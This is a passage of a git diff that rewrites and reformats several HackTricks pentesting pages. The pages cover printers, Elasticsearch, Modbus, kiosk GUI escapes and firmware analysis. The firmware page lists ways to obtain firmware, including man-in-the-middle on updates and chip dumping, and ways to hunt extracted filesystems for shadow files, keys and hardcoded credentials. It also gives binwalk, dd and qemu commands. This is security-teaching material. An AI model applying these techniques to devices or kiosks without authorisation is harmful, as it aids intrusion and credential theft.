diff --git a/network-services-pentesting/9001-pentesting-hsqldb.md b/network-services-pentesting/9001-pentesting-hsqldb.md index 06288a5bd..4eeac1b0f 100644 --- a/network-services-pentesting/9001-pentesting-hsqldb.md +++ b/network-services-pentesting/9001-pentesting-hsqldb.md @@ -17,7 +17,7 @@ Other ways to support HackTricks: # Basic Information -HSQLDB \([HyperSQL DataBase](http://hsqldb.org/)\) is the leading SQL relational database system written in Java. It offers a small, fast multithreaded and transactional database engine with in-memory and disk-based tables and supports embedded and server modes. +**HSQLDB \([HyperSQL DataBase](http://hsqldb.org/)\)** is the leading SQL relational database system written in Java. It offers a small, fast multithreaded and transactional database engine with in-memory and disk-based tables and supports embedded and server modes. **Default port:** 9001 diff --git a/network-services-pentesting/9100-pjl.md b/network-services-pentesting/9100-pjl.md index 7240eff64..dd21f326a 100644 --- a/network-services-pentesting/9100-pjl.md +++ b/network-services-pentesting/9100-pjl.md @@ -17,9 +17,9 @@ Other ways to support HackTricks: # Basic Information -Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer. It is the default method used by CUPS and the Windows printing architecture to communicate with network printers as it is considered as ‘_the simplest, fastest, and generally the most reliable network protocol used for printers_’. Raw port 9100 printing, also referred to as JetDirect, AppSocket or PDL-datastream actually **is not a printing protocol by itself**. Instead **all data sent is directly processed by the printing device**, just like a parallel connection over TCP. In contrast to LPD, IPP and SMB, this can send direct feedback to the client, including status and error messages. Such a **bidirectional channel** gives us direct **access** to **results** of **PJL**, **PostScript** or **PCL** commands. Therefore raw port 9100 printing – which is supported by almost any network printer – is used as the channel for security analysis with PRET and PFT. (From [here](http://hacking-printers.net/wiki/index.php/Port\_9100\_printing)) +From [here](http://hacking-printers.net/wiki/index.php/Port\_9100\_printing): Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer. It is the default method used by CUPS and the Windows printing architecture to communicate with network printers as it is considered as ‘_the simplest, fastest, and generally the most reliable network protocol used for printers_’. Raw port 9100 printing, also referred to as JetDirect, AppSocket or PDL-datastream actually **is not a printing protocol by itself**. Instead **all data sent is directly processed by the printing device**, just like a parallel connection over TCP. In contrast to LPD, IPP and SMB, this can send direct feedback to the client, including status and error messages. Such a **bidirectional channel** gives us direct **access** to **results** of **PJL**, **PostScript** or **PCL** commands. Therefore raw port 9100 printing – which is supported by almost any network printer – is used as the channel for security analysis with PRET and PFT. -If you want to learn more about [**hacking printers read this page**](pentesting-printers/). +If you want to learn more about [**hacking printers read this page**](http://hacking-printers.net/wiki/index.php/Main_Page). **Default port:** 9100 @@ -71,10 +71,6 @@ This is the tool you want to use to abuse printers: {% embed url="https://github.com/RUB-NDS/PRET" %} -## Hacking Printers best reference - -{% embed url="https://hacking-printers.net/wiki/index.php/File_system_access" %} - # **Shodan** * `pjl port:9100` diff --git a/network-services-pentesting/9200-pentesting-elasticsearch.md b/network-services-pentesting/9200-pentesting-elasticsearch.md index 74263d8f9..a1414ee53 100644 --- a/network-services-pentesting/9200-pentesting-elasticsearch.md +++ b/network-services-pentesting/9200-pentesting-elasticsearch.md @@ -16,17 +16,15 @@ Other ways to support HackTricks: ## Basic information -From the [main page](https://www.elastic.co/what-is/elasticsearch) you can find some useful descriptions: - -> Elasticsearch is a distributed, open source search and analytics engine for all types of data, including textual, numerical, geospatial, structured, and unstructured. Elasticsearch is built on Apache Lucene and was first released in 2010 by Elasticsearch N.V. (now known as Elastic). Known for its simple REST APIs, distributed nature, speed, and scalability, Elasticsearch is the central component of the Elastic Stack, a set of open source tools for data ingestion, enrichment, storage, analysis, and visualization. Commonly referred to as the ELK Stack (after Elasticsearch, Logstash, and Kibana), the Elastic Stack now includes a rich collection of lightweight shipping agents known as Beats for sending data to Elasticsearch. +Elasticsearch is a **distributed**, **open source** search and analytics engine for **all types of data**. It is known for its **speed**, **scalability**, and **simple REST APIs**. Built on Apache Lucene, it was first released in 2010 by Elasticsearch N.V. (now known as Elastic). Elasticsearch is the core component of the Elastic Stack, a collection of open source tools for data ingestion, enrichment, storage, analysis, and visualization. This stack, commonly referred to as the ELK Stack, also includes Logstash and Kibana, and now has lightweight data shipping agents called Beats. ### What is an Elasticsearch index? -An Elasticsearch _index_ **is a collection of documents** that are related to each other. Elasticsearch stores data as JSON documents. Each document correlates a set of _keys_ (names of fields or properties) with their corresponding values (strings, numbers, Booleans, dates, arrays of _values_, geolocations, or other types of data). +An Elasticsearch **index** is a collection of **related documents** stored as **JSON**. Each document consists of **keys** and their corresponding **values** (strings, numbers, booleans, dates, arrays, geolocations, etc.). -Elasticsearch uses a data structure called an _inverted index_, which is designed to allow very fast full-text searches. An inverted index lists every unique word that appears in any document and identifies all of the documents each word occurs in. +Elasticsearch uses an efficient data structure called an **inverted index** to facilitate fast full-text searches. This index lists every unique word in the documents and identifies the documents in which each word appears. -During the indexing process, Elasticsearch stores documents and builds an inverted index to make the document data searchable in near real-time. Indexing is initiated with the index API, through which you can add or update a JSON document in a specific index. +During the indexing process, Elasticsearch stores the documents and constructs the inverted index, allowing for near real-time searching. The **index API** is used to add or update JSON documents within a specific index. **Default port**: 9200/tcp diff --git a/network-services-pentesting/pentesting-modbus.md b/network-services-pentesting/pentesting-modbus.md index a70a93707..0c3e91593 100644 --- a/network-services-pentesting/pentesting-modbus.md +++ b/network-services-pentesting/pentesting-modbus.md @@ -17,7 +17,7 @@ Other ways to support HackTricks: # Basic Information -Modbus Protocol is a messaging structure developed by Modicon in 1979. It is used to establish master-slave/client-server communication between intelligent devices. +In 1979, the **Modbus Protocol** was developed by Modicon, serving as a messaging structure. Its primary use involves facilitating communication between intelligent devices, operating under a master-slave/client-server model. This protocol plays a crucial role in enabling devices to exchange data efficiently. **Default port:** 502 diff --git a/pentesting-web/http-connection-request-smuggling.md b/pentesting-web/http-connection-request-smuggling.md index 1f0d638e7..232731022 100644 --- a/pentesting-web/http-connection-request-smuggling.md +++ b/pentesting-web/http-connection-request-smuggling.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
@@ -56,7 +56,7 @@ To identify these vulnerabilities, the 'connection-state probe' feature in HTTP * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/pentesting-web/integer-overflow.md b/pentesting-web/integer-overflow.md index 9c8c9f409..358ac6ae4 100644 --- a/pentesting-web/integer-overflow.md +++ b/pentesting-web/integer-overflow.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. @@ -57,7 +57,7 @@ int main() { * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/pentesting-web/parameter-pollution.md b/pentesting-web/parameter-pollution.md index bce575bed..571ba81e7 100644 --- a/pentesting-web/parameter-pollution.md +++ b/pentesting-web/parameter-pollution.md @@ -61,7 +61,7 @@ The way web technologies handle duplicate HTTP parameters varies, affecting thei - **Flask:** Adopts the first parameter value encountered, such as `a=1` in a query string `a=1&a=2`, prioritizing the initial instance over subsequent duplicates. - **PHP (on Apache HTTP Server):** Contrarily, prioritizes the last parameter value, opting for `a=2` in the given example. This behavior can inadvertently facilitate HPP exploits by honoring the attacker's manipulated parameter over the original. -# References +## References * [https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654](https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654) * [https://github.com/google/google-ctf/tree/master/2023/web-under-construction/solution](https://github.com/google/google-ctf/tree/master/2023/web-under-construction/solution) diff --git a/pentesting-web/regular-expression-denial-of-service-redos.md b/pentesting-web/regular-expression-denial-of-service-redos.md index c20c4f4c1..bd62636f2 100644 --- a/pentesting-web/regular-expression-denial-of-service-redos.md +++ b/pentesting-web/regular-expression-denial-of-service-redos.md @@ -86,7 +86,7 @@ Regexp (a+)*$ took 723 milliseconds. * [https://github.com/doyensec/regexploit](https://github.com/doyensec/regexploit) * [https://devina.io/redos-checker](https://devina.io/redos-checker) -# References +## References * [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS) * [https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets) * [https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html) diff --git a/pentesting-web/reset-password.md b/pentesting-web/reset-password.md index 6bbe8258e..7a520b1a0 100644 --- a/pentesting-web/reset-password.md +++ b/pentesting-web/reset-password.md @@ -118,7 +118,7 @@ Stay informed with the newest bug bounties launching and crucial platform update * **Mitigation Steps**: - Set a reasonable expiration time for reset tokens and strictly enforce it server-side. -# References +## References * [https://anugrahsr.github.io/posts/10-Password-reset-flaws/#10-try-using-your-token](https://anugrahsr.github.io/posts/10-Password-reset-flaws/#10-try-using-your-token)
diff --git a/physical-attacks/escaping-from-gui-applications/README.md b/physical-attacks/escaping-from-gui-applications/README.md index 13b9e0e96..50a264ef2 100644 --- a/physical-attacks/escaping-from-gui-applications/README.md +++ b/physical-attacks/escaping-from-gui-applications/README.md @@ -35,7 +35,7 @@ You should check if you can: ## Command Execution -Maybe **using a **_**Open with**_** option** you can open/execute some kind of shell. +Maybe **using a `Open with`** option** you can open/execute some kind of shell. ### Windows @@ -152,6 +152,10 @@ Type this URLs to obtain an Explorer view: * `shell:::{{208D2C60-3AEA-1069-A2D7-08002B30309D}}` --> My Network Places * `shell:::{871C5380-42A0-1069-A2EA-08002B30309D}` --> Internet Explorer +## Show File Extensions + +Check this page for more information: [https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml](https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml) + # Browsers tricks Backup iKat versions: @@ -166,49 +170,27 @@ Source: https://medium.com/@Rend_/give-me-a-browser-ill-give-you-a-shell-de19811 ## Gestures and bottoms -### Swipe up with four (or five) fingers / Double-tap Home button +* Swipe up with four (or five) fingers / Double-tap Home button: To view the multitask view and change App -To view the multitask view and change App +* Swipe one way or another with four or five fingers: In order to change to the next/last App -### Swipe one way or another with four or five fingers +* Pinch the screen with five fingers / Touch Home button / Swipe up with 1 finger from the bottom of the screen in a quick motion to the up: To access Home + +* Swipe one finger from the bottom of the screen just 1-2 inches (slow): The dock will appear -In order to change to the next/last App +* Swipe down from the top of the display with 1 finger: To view your notifications -### Pinch the screen with five fingers / Touch Home button / Swipe up with 1 finger from the bottom of the screen in a quick motion to the up +* Swipe down with 1 finger the top-right corner of the screen: To see iPad Pro's control centre -To access Home +* Swipe 1 finger from the left of the screen 1-2 inches: To see Today view -### Swipe one finger from the bottom of the screen just 1-2 inches (slow) +* Swipe fast 1 finger from the centre of the screen to the right or left: To change to next/last App -The dock will appear +* Press and hold the On/**Off**/Sleep button at the upper-right corner of the **iPad +** Move the Slide to **power off** slider all the way to the right: To power off -### Swipe down from the top of the display with 1 finger +* Press the On/**Off**/Sleep button at the upper-right corner of the **iPad and the Home button for a few second**: To force a hard power off -To view your notifications - -### Swipe down with 1 finger the top-right corner of the screen - -To see iPad Pro's control centre - -### Swipe 1 finger from the left of the screen 1-2 inches - -To see Today view - -### Swipe fast 1 finger from the centre of the screen to the right or left - -To change to next/last App - -### Press and hold the On/**Off**/Sleep button at the upper-right corner of the **iPad +** Move the Slide to **power off** slider all the way to the right, - -To power off - -### Press the On/**Off**/Sleep button at the upper-right corner of the **iPad and the Home button for a few second** - -To force a hard power off - -### Press the On/**Off**/Sleep button at the upper-right corner of the **iPad and the Home button quickly** - -To take a screenshot that will pop up in the lower left of the display. Press both buttons at the same time very briefly as if you hold them a few seconds a hard power off will be performed. +* Press the On/**Off**/Sleep button at the upper-right corner of the **iPad and the Home button quickly**: To take a screenshot that will pop up in the lower left of the display. Press both buttons at the same time very briefly as if you hold them a few seconds a hard power off will be performed. ## Shortcuts @@ -299,7 +281,7 @@ These shortcuts are for the visual settings and sound settings, depending on the | ⌘. | Stop loading the current tab | | ⌘⌥F (Command-Option/Alt-F) | Search in your mailbox | -## References +# References * [https://www.macworld.com/article/2975857/6-only-for-ipad-gestures-you-need-to-know.html](https://www.macworld.com/article/2975857/6-only-for-ipad-gestures-you-need-to-know.html) * [https://www.tomsguide.com/us/ipad-shortcuts,news-18205.html](https://www.tomsguide.com/us/ipad-shortcuts,news-18205.html) diff --git a/physical-attacks/firmware-analysis/README.md b/physical-attacks/firmware-analysis/README.md index cd21582af..584a3cdb4 100644 --- a/physical-attacks/firmware-analysis/README.md +++ b/physical-attacks/firmware-analysis/README.md @@ -14,54 +14,40 @@ Other ways to support HackTricks: -## Introduction +## **Introduction** -Firmware is a type of software that provides communication and control over a device’s hardware components. It’s the first piece of code that a device runs. Usually, it **boots the operating system** and provides very specific runtime services for programs by **communicating with various hardware components**. Most, if not all, electronic devices have firmware. +Firmware is essential software that enables devices to operate correctly by managing and facilitating communication between the hardware components and the software that users interact with. It's stored in permanent memory, ensuring the device can access vital instructions from the moment it's powered on, leading to the operating system's launch. Examining and potentially modifying firmware is a critical step in identifying security vulnerabilities. -Devices store firmware in **nonvolatile memory**, such as ROM, EPROM, or flash memory. +## **Gathering Information** -It’s important to **examine** the **firmware** and then attempt to **modify** it, because we can uncover many security issues during this process. +**Gathering information** is a critical initial step in understanding a device's makeup and the technologies it uses. This process involves collecting data on: -## **Information gathering and reconnaissance** +- The CPU architecture and operating system it runs +- Bootloader specifics +- Hardware layout and datasheets +- Codebase metrics and source locations +- External libraries and license types +- Update histories and regulatory certifications +- Architectural and flow diagrams +- Security assessments and identified vulnerabilities -During this stage, collect as much information about the target as possible to understand its overall composition underlying technology. Attempt to gather the following: +For this purpose, **open-source intelligence (OSINT)** tools are invaluable, as is the analysis of any available open-source software components through manual and automated review processes. Tools like [Coverity Scan](https://scan.coverity.com) and [Semmle’s LGTM](https://lgtm.com/#explore) offer free static analysis that can be leveraged to find potential issues. -* Supported CPU architecture(s) -* Operating system platform -* Bootloader configurations -* Hardware schematics -* Datasheets -* Lines-of-code (LoC) estimates -* Source code repository location -* Third-party components -* Open source licenses (e.g. GPL) -* Changelogs -* FCC IDs -* Design and data flow diagrams -* Threat models -* Previous penetration testing reports -* Bug tracking tickets (e.g. Jira and bug bounty platforms such as BugCrowd or HackerOne) +## **Acquiring the Firmware** -Where possible, acquire data using open source intelligence (OSINT) tools and techniques. If open source software is used, download the repository and perform both manual as well as automated static analysis against the code base. Sometimes, open source software projects already use free static analysis tools provided by vendors that provide scan results such as [Coverity Scan](https://scan.coverity.com) and [Semmle’s LGTM](https://lgtm.com/#explore). +Obtaining firmware can be approached through various means, each with its own level of complexity: -## Getting the Firmware - -There are different ways with different difficulty levels to download the firmware - -* **Directly** from the development team, manufacturer/vendor or client -* **Build from scratch** using walkthroughs provided by the manufacturer -* From the **vendor's support site** -* **Google dork** queries targeted towards binary file extensions and file sharing platforms such as Dropbox, Box, and Google drive - * It’s common to come across firmware images through customers who upload contents to forums, blogs, or comment on sites where they contacted the manufacturer to troubleshoot an issue and were given firmware via a zip or flash drive sent. - * Example: `intitle:"Netgear" intext:"Firmware Download"` -* Download builds from exposed cloud provider storage locations such as Amazon Web Services (AWS) S3 buckets (with tools such as [https://github.com/sa7mon/S3Scanner](https://github.com/sa7mon/S3Scanner)) -* **Man-in-the-middle** (MITM) device communication during **updates** -* Extract directly **from hardware** via **UART**, **JTAG**, **PICit**, etc. -* Sniff **serial communication** within hardware components for **update server requests** -* Via a **hardcoded endpoint** within the mobile or thick applications -* **Dumping** firmware from the **bootloader** (e.g. U-boot) to flash storage or over the **network** via **tftp** -* Removing the **flash chip** (e.g. SPI) or MCU from the board for offline analysis and data extraction (LAST RESORT). - * You will need a supported chip programmer for flash storage and/or the MCU. +- **Directly** from the source (developers, manufacturers) +- **Building** it from provided instructions +- **Downloading** from official support sites +- Utilizing **Google dork** queries for finding hosted firmware files +- Accessing **cloud storage** directly, with tools like [S3Scanner](https://github.com/sa7mon/S3Scanner) +- Intercepting **updates** via man-in-the-middle techniques +- **Extracting** from the device through connections like **UART**, **JTAG**, or **PICit** +- **Sniffing** for update requests within device communication +- Identifying and using **hardcoded update endpoints** +- **Dumping** from the bootloader or network +- **Removing and reading** the storage chip, when all else fails, using appropriate hardware tools ## Analyzing the firmware @@ -143,176 +129,109 @@ Files will be in "`squashfs-root`" directory afterwards. `$ ubidump.py ` -### Analyzing the Filesystem -Now that you have the filesystem is time to start looking for bad practices such as: +## Analyzing Firmware -* Legacy **insecure network daemons** such as telnetd (sometimes manufactures rename binaries to disguise ) -* **Hardcoded credentials** (usernames, passwords, API keys, SSH keys, and backdoor variants ) -* **Hardcoded API** endpoints and backend server details -* **Update server functionality** that could be used as an entry point -* **Review uncompiled code and start up scripts** for remote code execution -* **Extract compiled binaries** to be used for offline analysis with a disassembler for future steps +Once the firmware is obtained, it's essential to dissect it for understanding its structure and potential vulnerabilities. This process involves utilizing various tools to analyze and extract valuable data from the firmware image. -Some **interesting things to look** for inside the firmware: +### Initial Analysis Tools -* etc/shadow and etc/passwd -* list out the etc/ssl directory -* search for SSL related files such as .pem, .crt, etc. -* search for configuration files -* look for script files -* search for other .bin files -* look for keywords such as admin, password, remote, AWS keys, etc. -* search for common web servers used on IoT devices -* search for common binaries such as ssh, tftp, dropbear, etc. -* search for banned c functions -* search for common command injection vulnerable functions -* search for URLs, email addresses and IP addresses -* and more… +A set of commands is provided for initial inspection of the binary file (referred to as ``). These commands help in identifying file types, extracting strings, analyzing binary data, and understanding the partition and filesystem details: -Tools that search for this kind of information (even if you always should take a manual look and get comfortable with the filesystem structure, the tools can help you finding **hidden things**): +```bash +file +strings -n8 +strings -tx #prints offsets in hexadecimal +hexdump -C -n 512 > hexdump.out +hexdump -C | head #useful for finding signatures in the header +fdisk -lu #lists partitions and filesystems, if there are multiple +``` -* [**LinPEAS**](https://github.com/carlospolop/PEASS-ng)**:** Awesome bash script that in this case is useful for searching **sensitive information** inside the filesystem. Just **chroot inside the firmware filesystem and run it**. -* [**Firmwalker**](https://github.com/craigz28/firmwalker)**:** Bash script to search for potential sensitive information -* [**The Firmware Analysis and Comparison Tool (FACT)**](https://github.com/fkie-cad/FACT\_core): - * Identification of software components such as operating system, CPU architecture, and third-party components along with their associated version information - * Extraction of firmware filesystem (s ) from images - * Detection of certificates and private keys - * Detection of weak implementations mapping to Common Weakness Enumeration (CWE) - * Feed & signature-based detection of vulnerabilities - * Basic static behavioral analysis - * Comparison (diff) of firmware versions and files - * User mode emulation of filesystem binaries using QEMU - * Detection of binary mitigations such as NX, DEP, ASLR, stack canaries, RELRO, and FORTIFY\_SOURCE - * REST API - * and more... -* [**FwAnalyzer**](https://github.com/cruise-automation/fwanalyzer): FwAnalyzer is a tool to analyze (ext2/3/4), FAT/VFat, SquashFS, UBIFS filesystem images, cpio archives, and directory content using a set of configurable rules. -* [**ByteSweep**](https://gitlab.com/bytesweep/bytesweep): A Free Software IoT Firmware Security Analysis Tool -* [**ByteSweep-go**](https://gitlab.com/bytesweep/bytesweep-go): This is a complete rewrite of the original ByteSweep project in Go. -* [**EMBA**](https://github.com/e-m-b-a/emba): _EMBA_ is designed as the central firmware analysis tool for penetration testers. It supports the complete security analysis process starting with the _firmware extraction_ process, doing _static analysis_ and _dynamic analysis_ via emulation and finally generating a report. _EMBA_ automatically discovers possible weak spots and vulnerabilities in firmware. Examples are insecure binaries, old and outdated software components, potentially vulnerable scripts or hard-coded passwords. +To assess the encryption status of the image, the **entropy** is checked with `binwalk -E `. Low entropy suggests a lack of encryption, while high entropy indicates possible encryption or compression. -{% hint style="warning" %} -Inside the filesystem you can also find **source code** of programs (that you should always **check**), but also **compiled binaries**. These programs might be somehow exposed and you should **decompile** and **check** them for potential vulnerabilities. +For extracting **embedded files**, tools and resources like the **file-data-carving-recovery-tools** documentation and **binvis.io** for file inspection are recommended. -Tools like [**checksec.sh**](https://github.com/slimm609/checksec.sh) can be useful to find unprotected binaries. For Windows binaries you could use [**PESecurity**](https://github.com/NetSPI/PESecurity). -{% endhint %} +### Extracting the Filesystem -## Emulating Firmware +Using `binwalk -ev `, one can usually extract the filesystem, often into a directory named after the filesystem type (e.g., squashfs, ubifs). However, when **binwalk** fails to recognize the filesystem type due to missing magic bytes, manual extraction is necessary. This involves using `binwalk` to locate the filesystem's offset, followed by the `dd` command to carve out the filesystem: -The idea to emulate the Firmware is to be able to perform a **dynamic analysis** of the device **running** or of a **single program**. +```bash +$ binwalk DIR850L_REVB.bin -{% hint style="info" %} -At times, partial or full emulation **may not work due to a hardware or architecture dependencies**. If the architecture and endianness match a device owned such as a raspberry pie, the root filesystem or specific binary can be transferred to the device for further testing. This method also applies to pre built virtual machines using the same architecture and endianness as the target. -{% endhint %} +$ dd if=DIR850L_REVB.bin bs=1 skip=1704084 of=dir.squashfs +``` -### Binary Emulation +Afterwards, depending on the filesystem type (e.g., squashfs, cpio, jffs2, ubifs), different commands are used to manually extract the contents. -If you just want to emulate one program to search for vulnerabilities, you first need to identify its endianness and the CPU architecture for which it was compiled. +### Filesystem Analysis -#### MIPS example +With the filesystem extracted, the search for security flaws begins. Attention is paid to insecure network daemons, hardcoded credentials, API endpoints, update server functionalities, uncompiled code, startup scripts, and compiled binaries for offline analysis. + +**Key locations** and **items** to inspect include: + +- **etc/shadow** and **etc/passwd** for user credentials +- SSL certificates and keys in **etc/ssl** +- Configuration and script files for potential vulnerabilities +- Embedded binaries for further analysis +- Common IoT device web servers and binaries + +Several tools assist in uncovering sensitive information and vulnerabilities within the filesystem: + +- [**LinPEAS**](https://github.com/carlospolop/PEASS-ng) and [**Firmwalker**](https://github.com/craigz28/firmwalker) for sensitive information search +- [**The Firmware Analysis and Comparison Tool (FACT)**](https://github.com/fkie-cad/FACT\_core) for comprehensive firmware analysis +- [**FwAnalyzer**](https://github.com/cruise-automation/fwanalyzer), [**ByteSweep**](https://gitlab.com/bytesweep/bytesweep), [**ByteSweep-go**](https://gitlab.com/bytesweep/bytesweep-go), and [**EMBA**](https://github.com/e-m-b-a/emba) for static and dynamic analysis + +### Security Checks on Compiled Binaries + +Both source code and compiled binaries found in the filesystem must be scrutinized for vulnerabilities. Tools like **checksec.sh** for Unix binaries and **PESecurity** for Windows binaries help identify unprotected binaries that could be exploited. + +## Emulating Firmware for Dynamic Analysis + +The process of emulating firmware enables **dynamic analysis** either of a device's operation or an individual program. This approach can encounter challenges with hardware or architecture dependencies, but transferring the root filesystem or specific binaries to a device with matching architecture and endianness, such as a Raspberry Pi, or to a pre-built virtual machine, can facilitate further testing. + +### Emulating Individual Binaries + +For examining single programs, identifying the program's endianness and CPU architecture is crucial. + +#### Example with MIPS Architecture + +To emulate a MIPS architecture binary, one can use the command: ```bash file ./squashfs-root/bin/busybox -./squashfs-root/bin/busybox: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, stripped ``` -Now you can **emulate** the busybox executable using **QEMU**. +And to install the necessary emulation tools: ```bash - sudo apt-get install qemu qemu-user qemu-user-static qemu-system-arm qemu-system-mips qemu-system-x86 qemu-utils +sudo apt-get install qemu qemu-user qemu-user-static qemu-system-arm qemu-system-mips qemu-system-x86 qemu-utils ``` -Because the executable **is** compiled for **MIPS** and follow the **big-endian** byte ordering, we’ll use QEMU’s **`qemu-mips`** emulator. To emulate **little-endian** executables, we would have to select the emulator with the `el` suffix(`qemu-mipsel`): +For MIPS (big-endian), `qemu-mips` is used, and for little-endian binaries, `qemu-mipsel` would be the choice. -```bash -qemu-mips -L ./squashfs-root/ ./squashfs-root/bin/ls -100 100.7z 15A6D2.squashfs squashfs-root squashfs-root-0 -``` +#### ARM Architecture Emulation -#### ARM Example - -```bash -file bin/busybox -bin/busybox: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /lib/ld-musl-armhf.so.1, no section header -``` - -Emulation: - -```bash -qemu-arm -L ./squashfs-root/ ./squashfs-root/bin/ls -1C00000.squashfs B80B6C C41DD6.xz squashfs-root squashfs-root-0 -``` +For ARM binaries, the process is similar, with the `qemu-arm` emulator being utilized for emulation. ### Full System Emulation -There are several tools, based in **qemu** in general, that will allow you to emulate the complete firmware: +Tools like [Firmadyne](https://github.com/firmadyne/firmadyne), [Firmware Analysis Toolkit](https://github.com/attify/firmware-analysis-toolkit), and others, facilitate full firmware emulation, automating the process and aiding in dynamic analysis. -* [**https://github.com/firmadyne/firmadyne**](https://github.com/firmadyne/firmadyne)**:** - * You need to install several things, configure postgres, then run the extractor.py script to extract the firmware, use the getArch.sh script to get the architecture. Then, use tar2db.py and makeImage.sh scripts to store information from the extracted image in the database and generate a QEMU image that we can emulate. The, use inferNetwork.sh script to get the network interfaces, and finally use the run.sh script, which is automatically created in the ./scratch/1/folder. -* [**https://github.com/attify/firmware-analysis-toolkit**](https://github.com/attify/firmware-analysis-toolkit)**:** - * This tool depends on firmadyne and automates the process of emulating the firmware using firmadynee. you need to configure `fat.config` before using it: `sudo python3 ./fat.py IoTGoat-rpi-2.img --qemu 2.5.0` -* [**https://github.com/therealsaumil/emux**](https://github.com/therealsaumil/emux) -* [**https://github.com/getCUJO/MIPS-X**](https://github.com/getCUJO/MIPS-X) -* [**https://github.com/qilingframework/qiling#qltool**](https://github.com/qilingframework/qiling#qltool) +## Dynamic Analysis in Practice -## **Dynamic analysis** +At this stage, either a real or emulated device environment is used for analysis. It's essential to maintain shell access to the OS and filesystem. Emulation may not perfectly mimic 